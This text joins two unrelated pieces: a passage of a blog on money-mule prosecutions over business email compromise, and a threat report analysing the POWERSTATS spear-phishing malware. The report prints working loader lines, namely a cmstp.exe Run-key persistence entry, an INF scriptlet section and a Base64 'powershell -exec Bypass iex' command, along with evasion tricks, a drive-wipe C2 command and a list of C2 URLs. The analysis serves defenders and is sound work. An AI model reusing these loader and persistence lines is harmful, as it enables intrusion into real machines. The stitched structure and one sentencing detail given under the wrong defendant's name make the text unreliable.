Washington was later arrested (December 2017) as a result of an open warrant in Kentucky, and testified to opening the accounts, making the wire transfers, and doing the cash withdrawals "at the behest of her recruiter/manager" who she did not identify.

Meanwhile, the Eau Claire, Wisconsin business contacted the US Secret Service about the scam involving the fake invoices from the lumber company. Records from the state of Florida revealed that Asjee Luxury had only one officer, and one signatory on its bank accounts. What seems to be a cooperating witness (Individual 1) in that case revealed that Rodriguez had recruited them to open several sham business accounts, including the TD Bank account belonging to Asjee Luxury! Shortly after the California real estate company wired money into that account, ATM video footage showed Individual 1 withdrawing $8,000 cash from the account. Individual 1 would then give half of the money to Rodriguez and keep the other half. Individual 1 also opened a shell company called Wide Assure Trades Inc and a corresponding Bank of America account.

On October 27, 2017, Rodriguez notified Individual 1 that Wide Assure Trades was going to receive some money.  That account was logged into the same day from 76.18.27.6, the IP address that Comcast listed for Rodriguez's home address at 2914 Funston Street, Hollywood Florida at that time.  (DHCP addresses change from time to time.)

Later an additional document, not an indictment but rather a "Superseding Information", was filed.



The Superseding Information reveals that Cynthia Rodriguez had incorporated "CR Elegant Trades" in September 2014 from her home address in Hialeah, Florida.  We already spoke of Washington's company, LW Nationwide, and Rowland's company, Asjee Luxury.  The superseding information speaks of (but does not give many details) an ongoing conspiracy from 2014 until 2018 that involved the creation of many shell companies and many fraudulent wire transfers. 

"It was the purpose of the conspiracy for the defendants and their co-conspirators to unlawfully enrich themselves by obtaining and misappropriating money from victims, by making materially false and fraudulent representations, and by the concealment of material facts, concerning, among other things, the true identity of the defendants and their co-conspirators and the purported need for victims to make payments to the defendants and their co-conspirators."

Lourdes Washington entered a plea agreement that included the fact that she may face 20 years in prison, 3 years supervised release, and a fine of $250,000 or double the pecuniary gain, as well as restitution, and acknowledging that they may be "denaturalized and removed" as a result of their crimes.  In other words, Washington had a public defender, as the only funds they tie to her are $37,225.  (It will be interesting to see what actually happens at sentencing on July 9, 2018.)

Cynthia Rodriguez also pleaded guilty, but in her case, she named her recruiter. In the plea agreement, she agrees that she and her co-conspirators opened shell corporations and bank accounts for the purpose of receiving proceeds of wire fraud scams in exchange for a percentage of profits. But then she says she was recruited to the scam by Roda TAHER. Taher, AKA Res, AKA Rezi, AKA Ressi, recruited Rodriguez initially as a money mule, but advanced her to being a sub-recruiter, working to hire and manage additional money mules in the South Florida area. Rodriguez was responsible for providing corporate documents for her mules' shell companies, driving the money mules to banks or ordering them to open certain accounts at certain banks, and accompanying them to withdraw funds. She also gave money mules directions on how to hide their schemes from banks, law enforcement and other individuals.

Rodriguez's plea agreement states that she knew the money was coming from wire fraud, and that she knew that business email compromise and spear phishing scams were used, including email account takeovers and "spoofed" email accounts making the victims believe they were making wire transfers to trusted partners, but instead depositing the funds into the accounts of the fraudsters.  Rodriguez says that she used the phone application "WhatsApp" to exchange encrypted messages with co-conspirators, including Taher, in order to evade detection by law enforcement.  Her plea confesses to laundering at least $4,760,669.80 between herself and the mules she recruited.

Like Washington, Rodriguez's plea states that she may do 20 years plus 3 supervised, and pay a fine of $250,000 or double the pecuniary gain, plus restitution, and that she may face denaturalization and removal.

The base offense level for Washington was 8, increased by 18 levels because the amount of laundered funds was between $3.5M and $9.5M, +3 because she was a manager or supervisor in a scheme involving 5 or more participants, +2 because of 18 USC 1956, and +2 because of the "sophisticated nature" of the laundering, for a level 33 offense. It was decreased only 3 levels for "demonstrating acceptance of responsibility and assisting authorities in the investigation", so she is still facing a level 30 offense.

"Furthermore, the Defendant stipulates that she owes restitution in the amount of $4,760,669.80!"

The plea agreement was signed May 23, 2018.  Rodriguez will be sentenced on July 11, 2018.

In Operation Wire Wire: The South Florida Cases Part 2, we'll look at 18-CR-20170, with defendants Eliot Pereira, Natalie Armona, Bryant Ortega, Melissa Rios, Angelo Santa Cruz, Alexis Fernandez Cruz, Roberto Carlos Gracia, Jose E. Rivera, Angeles De Jesus Angulo, Jennifer Ruiz, Yirielkys Pacheco Fernandez, and Sebastian Loayza.

Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign

Introduction

From January 2018 to March 2018, through FireEye’s Dynamic Threat Intelligence, we observed attackers leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.

We attribute this activity to TEMP.Zagros (reported by Palo Alto Networks and Trend Micro as MuddyWater), an Iran-nexus actor that has been active since at least May 2017. This actor has engaged in prolific spear phishing of government and defense entities in Central and Southwest Asia. The spear phishing emails and attached malicious macro documents typically have geopolitical themes. When successfully executed, the malicious documents install a backdoor we track as POWERSTATS.

One of the more interesting observations during the analysis of these files was the re-use of the latest AppLocker bypass, and of lateral movement techniques repurposed for indirect code execution: the remote IP address that the lateral movement technique would normally target was replaced with the local machine's IP address, so the same call achieves code execution on the local system.

Campaign Timeline

In this campaign, the threat actor’s tactics, techniques and procedures (TTPs) shifted after about a month, as did their targets. A brief timeline of this activity is shown in Figure 1.


Figure 1: Timeline of this recently observed spear phishing campaign

The first part of the campaign (from Jan. 23, 2018, to Feb. 26, 2018) used a macro-based document that dropped a VBS file and an INI file. The INI file contains a Base64 encoded PowerShell command; when WScript.exe runs the VBS file, the script builds the command line that invokes PowerShell to decode and execute that command. The process chain is shown in Figure 2.


Figure 2: Process chain for the first part of the campaign

Although the actual VBS script changed from sample to sample, with different levels of obfuscation and different ways of invoking the next stage of the process tree, its final purpose remained the same: invoking PowerShell to decode the Base64 encoded PowerShell command in the INI file dropped earlier by the macro, and executing it. One such example of the VBS invoking PowerShell via MSHTA is shown in Figure 3.


Figure 3: VBS invoking PowerShell via MSHTA

The second part of the campaign (from Feb. 27, 2018, to March 5, 2018) used a new variant of the macro that does not use VBS for PowerShell code execution. Instead, it uses one of the recently disclosed code execution techniques leveraging INF and SCT files, which we will go on to explain later in the blog.

Infection Vector

We believe the infection vector for all of the attacks in this campaign is a macro-based document sent as an email attachment. One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4:


Figure 4: Sample spear phishing email containing macro-based document attachment

The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India. Four examples follow; a complete list is available in the Indicators of Compromise section at the end of the blog.

Figure 5 shows a document purporting to be from the National Assembly of Pakistan.


Figure 5: Document purporting to be from the National Assembly of Pakistan

A document purporting to be from the Turkish Armed Forces, with content written in the Turkish language, is shown in Figure 6.


Figure 6: Document purporting to be from the Turkish Armed Forces

A document purporting to be from the Institute for Development and Research in Banking Technology (established by the Reserve Bank of India) is shown in Figure 7.


Figure 7: Document purporting to be from the Institute for Development and Research in Banking Technology

Figure 8 shows a document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan.


Figure 8: Document written in Tajik that purports to be from the Ministry of Internal Affairs of the Republic of Tajikistan

Each of these macro-based documents used similar techniques for code execution, persistence and communication with the command and control (C2) server.

Indirect Code Execution Through INF and SCT

This scriptlet code execution technique leveraging INF and SCT files was recently discovered and documented in February 2018. The threat group in this recently observed campaign – TEMP.Zagros – weaponized their malware using the following techniques.

The macro in the Word document drops three files into a hard coded path, C:\programdata. Because the path is hard coded, execution is only observed on Windows 7 and above. The three files are:

  • Defender.sct – The malicious JavaScript based scriptlet file.
  • DefenderService.inf – The INF file that is used to invoke the above scriptlet file.
  • WindowsDefender.ini – The Base64 encoded and obfuscated PowerShell script.

After dropping the three files, the macro will set the following registry key to achieve persistence:

\REGISTRY\USER\<SID>\Software\Microsoft\Windows\CurrentVersion\Run\"WindowsDefenderUpdater" = cmstp.exe /s c:\programdata\DefenderService.inf

Upon system restart, cmstp.exe will be used to execute the SCT file indirectly through the INF file. This is possible because inside the INF file we have the following section:

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:/programdata/Defender.sct

That section gets indirectly invoked through the DefaultInstall_SingleUser section of INF, as shown in Figure 9.


Figure 9: Indirectly invoking SCT through the DefaultInstall_SingleUser section of INF

This method of code execution is performed in an attempt to evade security products. FireEye MVX and HX Endpoint Security technology successfully detect this code execution technique.
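The chain above (a Run value that launches cmstp.exe, an INF whose DefaultInstall section points at an (Un)RegisterOCXs entry, and that entry loading scrobj.dll with a scriptlet path) leaves two artefacts an analyst can check mechanically. The following Python is an added example, not code from the original post or from FireEye: it parses an INF and reports scrobj.dll scriptlet entries reachable from a DefaultInstall* section, and flags Run values that use cmstp.exe as an autorun launcher. The INF text and Run values are constructed for the example from the fragments quoted above; the surrounding INF sections ([version], [Strings]) are assumed to follow the standard Connection Manager layout and are not from the real DefenderService.inf.

```python
"""Two analyst checks for the cmstp.exe / INF / scriptlet chain described above.

1. parse an INF and report any DefaultInstall* section whose RegisterOCXs or
   UnRegisterOCXs directive points at an entry that loads scrobj.dll with a
   caller-supplied scriptlet (the [UnRegisterOCXSection] trick);
2. scan Run-key values for cmstp.exe being used as an autorun launcher.
The INF text and Run values below are constructed for this example from the
fragments quoted in the write-up; they are not the real DefenderService.inf.
"""
import re
from typing import Dict, List

# Constructed INF modelled on the quoted [UnRegisterOCXSection] (assumption:
# the rest of the file follows the standard Connection Manager layout).
SAMPLE_INF = """\
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\\scrobj.dll,NI,c:/programdata/Defender.sct

[Strings]
ServiceName="WindowsDefender"
"""

# Constructed Run-key dump (value name -> command line); the second entry is benign.
SAMPLE_RUN_VALUES = {
    "WindowsDefenderUpdater": r"cmstp.exe /s c:\programdata\DefenderService.inf",
    "OneDrive": r'"C:\Users\Public\OneDrive.exe" /background',
}

OCX_DIRECTIVES = ("registerocxs", "unregisterocxs")
CMSTP_RE = re.compile(r"\bcmstp(?:\.exe)?\b.*?(\S+\.inf)\b", re.IGNORECASE)


def parse_inf(text: str) -> Dict[str, List[str]]:
    """Minimal INF parser: lower-cased section name -> list of raw entry lines."""
    sections: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts an INF comment
        if not line:
            continue
        header = re.fullmatch(r"\[(.+?)\]", line)
        if header:
            current = header.group(1).strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def find_scriptlet_abuse(inf_text: str) -> List[str]:
    """Report scrobj.dll entries reachable from a DefaultInstall* section."""
    sections = parse_inf(inf_text)
    findings: List[str] = []
    for name, entries in sections.items():
        if not name.startswith("defaultinstall"):
            continue
        for entry in entries:
            key, _, target = entry.partition("=")
            if key.strip().lower() not in OCX_DIRECTIVES:
                continue
            target = target.strip()
            for ocx in sections.get(target.lower(), []):
                # Entry format: <dll>,<flags>,<argument>. The N/I flags skip
                # DllRegisterServer and call DllInstall with the third field as
                # its argument; scrobj.dll treats that argument as the scriptlet.
                parts = [p.strip() for p in ocx.split(",")]
                if len(parts) >= 3 and parts[0].lower().endswith("scrobj.dll"):
                    findings.append(
                        f"[{name}] -> [{target}] loads scrobj.dll with scriptlet {parts[2]}"
                    )
    return findings


def suspicious_autoruns(run_values: Dict[str, str]) -> List[str]:
    """Flag Run values that launch cmstp.exe with an INF: a signed system binary used for persistence."""
    return [
        f"Run\\{name}: cmstp.exe launching INF {m.group(1)}"
        for name, cmd in run_values.items()
        if (m := CMSTP_RE.search(cmd))
    ]


if __name__ == "__main__":
    for finding in find_scriptlet_abuse(SAMPLE_INF) + suspicious_autoruns(SAMPLE_RUN_VALUES):
        print(finding)
```

cmstp.exe itself is a signed Microsoft binary, so the detection has to key on its argument and on the INF's content rather than on the process image; a legitimate Connection Manager profile install would not point RegisterOCXs at scrobj.dll with a path under C:\ProgramData.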

SCT File Analysis

The Defender.sct file is obfuscated JavaScript. Its main function is to Base64 decode the contents of the WindowsDefender.ini file and execute the decoded PowerShell script using the following command line:

powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\WindowsDefender.ini))))

The rest of the malicious activities are performed by the PowerShell Script.

PowerShell File Analysis

The PowerShell script employs several layers of obfuscation to hide its actual functionality. In addition to obfuscation techniques, it also has the ability to detect security tools on the analysis machine, and can also shut down the system if it detects the presence of such tools.

Some of the key obfuscation techniques used are:

  • Character Replacement: Several instances of character replacement and string reversing techniques (Figure 10) make analysis difficult.


Figure 10: Character replacement and string reversing techniques

  • PowerShell Environment Variables: Malware authors commonly mask critical strings such as “IEX” by indexing into environment variables. Two instances used in this script are:
    • $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'
    • ($ENV:cOMsPEC[4,26,25]-jOin'')
    On a default installation $env:PUBLIC is C:\Users\Public and $env:COMSPEC is C:\Windows\system32\cmd.exe, so both expressions evaluate to “iex”.
  • XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11.


Figure 11: PowerShell script is XOR encoded using a single byte key
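The three layers described in this section and in the SCT analysis above (the Base64/UTF-16LE wrapping of WindowsDefender.ini, the environment-variable indexing that spells “iex”, and the single-byte XOR over the bulk of the script) can each be undone offline. The following Python is an added example written for this page, not code from the original post or from the malware: it mirrors the SCT's decode step, evaluates the $env:VAR[i] expressions against default Windows values, and brute-forces a single-byte XOR key by scoring each candidate on printable bytes and PowerShell keywords. The sample script, the XOR key (0x5A) and the loopback URL are constructed for the example; the real key and script are not given in the post.

```python
"""Peel the loader layers described above, offline, the way an analyst would.

Layer 1: WindowsDefender.ini holds Base64 of a UTF-16LE script; this is what
         [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(...))
         in the SCT's command line undoes.
Layer 2: 'iex' is spelled out from indexes into $env:PUBLIC / $env:COMSPEC.
Layer 3: the bulk of the script is XOR-encoded with a single-byte key.
All sample data is constructed here; the real key and script are not on the page.
"""
import base64
import re
from typing import Dict, Tuple

# Values of the two environment variables on a stock Windows install with the
# system drive on C: (assumption; adjust if the victim image differs).
DEFAULT_ENV: Dict[str, str] = {
    "PUBLIC": r"C:\Users\Public",
    "COMSPEC": r"C:\Windows\system32\cmd.exe",
}

ENV_INDEX_RE = re.compile(r"\$env:(\w+)\[([\d,\s]+)\]", re.IGNORECASE)

# Constructed stand-in for the decoded script; it is not the real POWERSTATS code.
SAMPLE_SCRIPT = (
    "function Register-Victim { param($sysinfo)\n"
    "  $body = @{SYSINFO = $sysinfo; ACTION = 'REGISTER'}\n"
    "  iex ((iwr 'http://127.0.0.1/db_template.php' -Method POST -Body $body).Content)\n"
    "}\n"
)
SAMPLE_XOR_KEY = 0x5A   # constructed key for the demo


def decode_ini_layer(ini_text: str) -> str:
    """Mirror the SCT: Base64-decode, then read the bytes as UTF-16LE."""
    return base64.b64decode(ini_text).decode("utf-16-le")


def encode_ini_layer(script: str) -> str:
    """Build a WindowsDefender.ini-style payload (used only to construct sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def resolve_env_index_string(expr: str, env: Dict[str, str] = DEFAULT_ENV) -> str:
    """Evaluate a PowerShell expression that builds a string from $env:VAR[i],
    $env:VAR[i,j,k] -join '' pieces and quoted literals joined with '+'."""
    def expand(m: re.Match) -> str:
        value = env[m.group(1).upper()]
        return "'" + "".join(value[int(i)] for i in m.group(2).split(",")) + "'"
    s = ENV_INDEX_RE.sub(expand, expr)
    s = re.sub(r"-join\s*''", "", s, flags=re.IGNORECASE)   # chars already joined above
    return "".join(re.findall(r"'([^']*)'", s))               # concatenate the literals


def xor_single_byte(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


POWERSHELL_MARKERS = (b"$", b"function", b"invoke", b"iex", b"http", b"param")


def brute_force_xor(blob: bytes) -> Tuple[int, bytes]:
    """Try all 256 keys; rank by printable-byte count plus PowerShell keyword hits."""
    best_score, best_key, best_plain = -1, 0, b""
    for key in range(256):
        plain = xor_single_byte(blob, key)
        printable = sum(1 for b in plain if 32 <= b < 127 or b in (9, 10, 13))
        hits = sum(1 for kw in POWERSHELL_MARKERS if kw in plain.lower())
        score = printable + 100 * hits
        if score > best_score:
            best_score, best_key, best_plain = score, key, plain
    return best_key, best_plain


if __name__ == "__main__":
    ini = encode_ini_layer(SAMPLE_SCRIPT)
    print(decode_ini_layer(ini) == SAMPLE_SCRIPT)
    print(resolve_env_index_string("$eNv:puBLic[13]+$ENv:pUBLIc[5]+'x'"))
    key, plain = brute_force_xor(xor_single_byte(SAMPLE_SCRIPT.encode(), SAMPLE_XOR_KEY))
    print(hex(key), plain.decode())
```

The keyword bonus matters: several wrong keys also yield mostly printable text (flipping a single low bit maps letters onto letters), so a printable-ratio score alone can tie; requiring PowerShell vocabulary in the candidate plaintext breaks the tie reliably.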

After deobfuscating the contents of the PowerShell Script, we can divide it into three sections.

Section 1

The first section of the PowerShell script is responsible for setting different key variables that are used by the remaining sections of the PowerShell script, especially the following variables:

  • TEMpPAtH = "C:\ProgramData\" (the path used for storing the temp files)
  • Get_vAlIdIP = https://api.ipify.org/ (used to get the public IP address of the machine)
  • FIlENAmePATHP = WindowsDefender.ini (file used to store PowerShell code)
  • PRIVAtE = Private Key exponents
  • PUbLIc = Public Key exponents
  • Hklm = "HKLM:\Software\"
  • Hkcu = "HKCU:\Software\"
  • ValuE = "kaspersky"
  • SYSID
  • DrAGon_MidDLe = [array of proxy URLs]

Among those variables, there is one variable of particular interest, DrAGon_MidDLe, which stores the list of proxy URLs (detailed at the end of the blog in the Network Indicators portion of the Indicators of Compromise section) that will be used to interact with the C2 server, as shown in Figure 12.


Figure 12: DrAGon_MidDLe stores the list of proxy URLs used to interact with C2 server

Section 2

The second section of the PowerShell script has the ability to perform encryption and decryption of messages that are exchanged between the system and the C2 server. The algorithm used for encryption and decryption is RSA, which leverages the public and private key exponents included in Section 1 of the PowerShell script.

Section 3

The third section of the PowerShell script is the biggest section and has a wide variety of functionalities.

During analysis, we observed a code section in which a hard coded message written in Chinese is printed if the connection to the C2 server fails. The English translation of this message is: “Cannot connect to website, please wait for dragon”.

Other functionalities provided by this section of the PowerShell Script are as follows:

  • Retrieves the following data from the system by leveraging Windows Management Instrumentation (WMI) queries and environment variables:
    • IP Address from Network Adapter Configuration
    • OS Name
    • OS Architecture
    • Computer Name
    • Computer Domain Name
    • Username

All of this data is concatenated and formatted as shown in Figure 13:


Figure 13: Concatenated and formatted data retrieved by PowerShell script

  • Register the victim’s machine to the C2 server by sending the REGISTER command to the server. In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server.

While sending to the C2 server, the data is formatted as follows:

@{SYSINFO  = $get.ToString(); ACTION = "REGISTER";}

  • Ability to take screenshots.
  • Checks for the presence of security tools (detailed in the Appendix) and if any of these security tools are discovered, then the system will be shut down, as shown in Figure 14.


Figure 14: System shut down upon discovery of security tools

  • Ability to receive PowerShell script from the C2 server and execute on the machine. Several techniques are employed for executing the PowerShell code:
    • If the command starts with “excel”, it leverages the DDEInitiate method of Excel.Application to execute the code.
    • If the command starts with “outlook”, it leverages Outlook.Application and MSHTA to execute the code.
    • If the command starts with “risk”, execution is performed through a DCOM object.
  • File upload functionality.
  • Ability to disable Microsoft Office Protected View (as shown in Figure 15) by setting the following keys in the Windows Registry:
    • DisableAttachmentsInPV
    • DisableInternetFilesInPV
    • DisableUnsafeLocationsInPV


Figure 15: Disabling Microsoft Office Protected View

  • Ability to remotely reboot or shut down or clean the system based on the command received from the C2 server, as shown in Figure 16.


Figure 16: Reboot, shut down and clean commands

  • Ability to sleep for a given number of seconds.

The following table summarizes the main C2 commands supported by this PowerShell Script.

C2 Command   Purpose
reboot       Reboot the system using the shutdown command
shutdown     Shut down the system using the shutdown command
clean        Wipe the drives C:\, D:\, E:\, F:\
screenshot   Take a screenshot of the system
upload       Encrypt and upload information from the system
excel        Leverage the Excel.Application COM object for code execution
outlook      Leverage the Outlook.Application COM object for code execution
risk         Leverage a DCOM object for code execution

Conclusion

This activity shows that TEMP.Zagros stays up to date with the latest code execution and persistence techniques, and that the group can quickly fold them into its malware. By combining multiple layers of obfuscation, they slow reverse engineering and also attempt to evade security products.

Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

Macro based Documents and Hashes

SHA256 Hash | Filename | Targeted Region
eff78c23790ee834f773569b52cddb01dc3c4dd9660f5a476af044ef6fe73894 | na.doc | Pakistan
76e9988dad0278998861717c774227bf94112db548946ef617bfaa262cb5e338 | Invest in Turkey.doc | Turkey
6edc067fc2301d7a972a654b3a07398d9c8cbe7bb38d1165b80ba4a13805e5ac | güvenlik yönergesi. .doc | Turkey
009cc0f34f60467552ef79c3892c501043c972be55fe936efb30584975d45ec0 | idrbt.doc | India
18479a93fc2d5acd7d71d596f27a5834b2b236b44219bb08f6ca06cf760b74f6 | Türkiye Cumhuriyeti Kimlik Kartı.doc | Turkey
3da24cd3af9a383b731ce178b03c68a813ab30f4c7c8dfbc823a32816b9406fb | Turkish Armed Forces.doc | Turkey
9038ba1b7991ff38b802f28c0e006d12d466a8e374d2f2a83a039aabcbe76f5c | na.gov.pk.doc | Pakistan
3b1d8dcbc8072b1ec10f5300c3ea9bb20db71bd8fa443d97332790b74584a115 | MVD-FORM-1800.doc | Tajikistan
cee801b7a901eb69cd166325ed3770daffcd9edd8113a961a94c8b9ddf318c88 | KEGM-CyberAttack.doc | Turkey
1ee9649a2f9b2c8e0df318519e2f8b4641fd790a118445d7a0c0b3c02b1ba942 | IL-1801.doc | Turkey
aa60c1fae6a0ef3b9863f710e46f0a7407cf0feffa240b9a4661a4e8884ac627 | kiyiemniyeti.doc | Turkey
93745a6605a77f149471b41bd9027390c91373558f62058a7333eb72a26faf84 | TCELL-S1-M.doc | Tajikistan
c87799cce6d65158da97aa31a5160a0a6b6dd5a89dea312604cc66ed5e976cc9 | egm-1.doc | Turkey
2cea0b740f338c513a6390e7951ff3371f44c7c928abf14675b49358a03a5d13 | Connectel .pk.doc | Pakistan
18cf5795c2208d330bd297c18445a9e25238dd7f28a1a6ef55e2a9239f5748cd | gßvenlik_yÜnergesi_.doc | Turkey
153117aa54492ca955b540ac0a8c21c1be98e9f7dd8636a36d73581ec1ddcf58 | MIT.doc | Turkey
d07d4e71927cab4f251bcc216f560674c5fb783add9c9f956d3fc457153be025 | Gvenlik Ynergesi.doc | Turkey
af5f102f0597db9f5e98068724e31d68b8f7c23baeea536790c50db587421102 | Gvenlik Ynergesi.doc | Turkey
5550615affe077ddf66954edf132824e4f1fe16b3228e087942b0cad0721a6af | NA | Turkey
3d96811de7419a8c090a671d001a85f2b1875243e5b38e6f927d9877d0ff9b0c | Anadolu Güneydoğu Projesinde .doc | Turkey

Network Indicators

List of Proxy URLs

hxxp://alessandrofoglino[.]com//db_template.php

hxxp://www.easy-home-sales[.]co.za//db_template.php

hxxp://www.almaarefut[.]com/admin/db_template.php

hxxp://chinamall[.]co.za//db_template.php

hxxp://amesoulcoaching[.]com//db_template.php

hxxp://www.antigonisworld[.]com/wp-includes/db_template.php

hxxps://anbinni.ba/wp-admin/db_template.php

hxxp://arctistrade[.]de/wp/db_template.php

hxxp://aianalytics[.]ie//db_template.php

hxxp://www.gilforsenate[.]com//db_template.php

hxxp://mgamule[.]co.za/oldweb/db_template.php

hxxp://chrisdejager-attorneys[.]co.za//db_template.php

hxxp://alfredocifuentes[.]com//db_template.php

hxxp://alxcorp[.]com//db_template.php

hxxps://www.aircafe24[.]com//db_template.php

hxxp://agencereferencement.be/wp-admin/db_template.php

hxxp://americanlegacies[.]org/webthed_ftw/db_template.php

hxxps://aloefly[.]net//db_template.php

hxxp://www.duotonedigital[.]co.za//db_template.php

hxxp://architectsinc[.]net//db_template.php

hxxp://www.tanati[.]co.za//db_template.php

hxxp://emware[.]co.za//db_template.php

hxxp://breastfeedingbra[.]co.za//db_template.php

hxxp://alhidayahfoundation[.]co[.]uk/category/db_template.php

hxxp://cashforyousa[.]co.za//db_template.php

hxxps://www.airporttaxi-uk[.]co[.]uk/wp-includes/db_template.php

hxxp://antjetaubert[.]de//db_template.php

hxxp://hesterwebber[.]co.za//db_template.php

hxxp://fickstarelectrical[.]co.za//db_template.php

hxxp://alex-frost[.]com/assets/db_template.php

hxxps://americanbrasil[.]com.br//db_template.php

hxxps://aileeshop[.]com//db_template.php

hxxps://annodle[.]com//db_template.php

hxxp://goldeninstitute[.]co.za/contents/db_template.php

hxxp://ednpk[.]com//db_template.php

hxxp://www.arabiccasinochoice[.]com//db_template.php

hxxp://proeventsports[.]co.za//db_template.php

hxxp://glenbridge[.]co.za//db_template.php

hxxp://berped[.]co.za//db_template.php

hxxp://best-digital-slr-cameras[.]com//db_template.php

hxxp://antonhirvonen[.]com/pengalandet.se/wp-includes/db_template.php

hxxp://www.alpacal[.]com//db_template.php

hxxps://www.alakml[.]com/wp-admin/db_template.php

hxxp://ar-rihla[.]com//db_template.php

hxxp://appsvoice[.]info//db_template.php

hxxp://www.bashancorp[.]co.za//db_template.php

hxxp://alexanderbecker[.]net/services/db_template.php

hxxp://visionclinic.co.ls/visionclinic/db_template.php

hxxps://www.angelesrevista[.]com//db_template.php

hxxps://www.antojoentucocina[.]com//db_template.php

hxxp://apollonweb[.]com//db_template.php

hxxps://www.alphapixa[.]com//db_template.php

hxxp://capitalradiopetition[.]co.za//db_template.php

hxxp://www.generictoners[.]co.za//db_template.php

hxxps://alnahdatraining[.]com//db_template.php

hxxps://albousala[.]com//db_template.php

hxxps://www.dopetroleum[.]com//db_template.php

hxxp://bios-chip[.]co.za//db_template.php

hxxp://www.crissamconsulting[.]co.za//db_template.php

hxxp://capriflower[.]co.za//db_template.php

hxxp://www.dingaanassociates[.]co.za//db_template.php

hxxp://indiba-africa[.]co.za//db_template.php

hxxp://verifiedseller[.]co.za/js/db_template.php

hxxps://www.buraqlubricant[.]com//db_template.php

hxxp://aqarco[.]com/wp-admin/db_template.php

hxxp://allaboutblockchain[.]net//db_template.php

hxxp://www.amexcars[.]info/tpl/db_template.php

hxxp://clandecor[.]co.za/rvsUtf8Backup/db_template.php

hxxp://bakron[.]co.za//db_template.php

hxxp://gsnconsulting[.]co.za//db_template.php

hxxp://vumavaluations[.]co.za//db_template.php

hxxp://heritagetravelmw[.]com//db_template.php

hxxp://ampvita[.]com//db_template.php

hxxp://ahero-resource-center[.]org/administrator/db_template.php

hxxps://arbulario[.]com//db_template.php

hxxp://havilahglo[.]co.za/wpscripts/db_template.php

hxxp://www.bestdecorativemirrors[.]com/More-Mirrors/db_template.php

hxxp://delectronics[.]com[.]pk//db_template.php

hxxp://antucomp[.]com//db_template.php

hxxp://advocatetn[.]com/font-awesome/fonts/db_template.php

hxxps://amooy[.]com/webservice/db_template.php

hxxp://www.harmonyguesthouse[.]co.za//db_template.php

hxxp://alanrori[.]com//db_template.php

hxxp://algarvesup[.]com//db_template.php

hxxp://desirablehair[.]co.za//db_template.php

hxxp://comsip[.]org.mw//db_template.php

hxxp://jdcorporate[.]co.za/catalog/db_template.php

hxxp://andrewfinnburhoe[.]com//db_template.php

hxxp://anyeva[.]com/wp-includes/db_template.php

hxxp://www.agenceuhd[.]com//db_template.php

hxxp://host4unix[.]net/host24new/db_template.php

hxxp://www.altaica[.]ca/wordpress/db_template.php

hxxp://www.allbuyer[.]co[.]uk//db_template.php

hxxp://jvpsfunerals[.]co.za//db_template.php

hxxp://immaculatepainters[.]co.za//db_template.php

hxxp://tcpbereka[.]co.za/js/db_template.php

hxxp://clientcare.co.ls//db_template.php

hxxp://investaholdings[.]co.za/htc/db_template.php

hxxp://www.amjobs[.]co[.]uk//db_template.php

hxxp://www.agirlgonewine[.]com/store/db_template.php

hxxp://findinfo-more[.]com//db_template.php

hxxp://asgen[.]org//db_template.php

hxxp://alphasalesrecruitment[.]com//db_template.php

hxxp://irshadfoundation[.]co.za//db_template.php

hxxp://analternatif[.]com/includes/db_template.php

hxxp://arbruisseau[.]com/profiles/db_template.php

hxxp://ladiescircle[.]co.za//db_template.php

hxxp://all-reseller[.]com/zzz_backup/db_template.php

hxxp://alcatrazmoon[.]com/images/db_template.php

hxxp://www.alcalumni[.]com/wp-includes/db_template.php

hxxp://aniljoseph[.]com/servermon/db_template.php

hxxp://alwake3press[.]com/wp-includes/db_template.php

hxxp://www.hfhl[.]org.ls/habitat/db_template.php

hxxp://alcafricanos[.]com/slsmonographs/db_template.php

hxxps://agapeencounter[.]org//db_template.php

hxxp://apobiomedix[.]ca//db_template.php

hxxp://anythinglah[.]info//db_template.php

hxxp://aniroleplay[.]net//db_template.php

hxxp://www.allcopytoners[.]com//db_template.php

hxxp://alphaobring[.]com//db_template.php

hxxp://www.galwayprimary[.]co.za//db_template.php

hxxp://alnuzha[.]org/en/db_template.php

hxxps://ancient-wisdoms[.]com//db_template.php

hxxp://amazingenergysavings[.]net//db_template.php

hxxp://gvs[.]com[.]pk/font-awesome/db_template.php

hxxp://geetransfers[.]co.za/font-awesome/db_template.php

hxxp://carlagrobler[.]co.za/components/db_template.php

hxxp://amazingashwini[.]com//db_template.php

hxxp://aminearserver[.]es//db_template.php

hxxp://lensofafrica[.]co.za//db_template.php

hxxp://greenacrestf[.]co.za/video/db_template.php

hxxp://www.tonaro[.]co.za//db_template.php

hxxp://alephit2[.]biz/kitzz/db_template.php

hxxp://lppaportal[.]org.ls//db_template.php

hxxp://alkousy[.]com//db_template.php

hxxp://ambulatorioveterinariocalusco[.]com/img/common/db_template.php

hxxp://fragranceoil[.]co.za//db_template.php

hxxp://www.eloquent[.]co.za/nweb2/db_template.php

hxxp://chrishanicdc[.]org/wpimages/db_template.php

hxxp://ahc.me[.]uk//db_template.php

hxxp://www.britishasia-equip[.]co[.]uk//db_template.php

hxxp://always-beauty[.]ch//db_template.php

hxxps://www.ancamamara[.]com/wp-admin/db_template.php

hxxp://entracorntrading[.]co.za//db_template.php

